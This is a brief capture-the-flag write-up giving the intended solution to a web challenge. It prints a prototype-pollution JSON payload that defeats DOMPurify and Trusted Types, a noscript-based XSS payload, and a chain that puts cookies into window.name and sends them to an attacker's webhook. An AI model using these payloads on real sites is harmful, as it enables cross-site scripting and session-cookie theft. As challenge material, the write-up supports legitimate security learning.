I inspired this challenge while i was playing a challenge by @53c0nd-2473.
- Overwrite Object object's getOwnPropertyNames with "nice feature" to bypass dompurify + trusted types.
{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
- Bypass custom filter with
noscript
tag. example:<noscript><img src="</noscript><img src=1 onerror=alert()">
- Steal cookies with using
debug.js
and set parent's name to cookies and do redirect with meta tag - Send
window.name
to your webhook.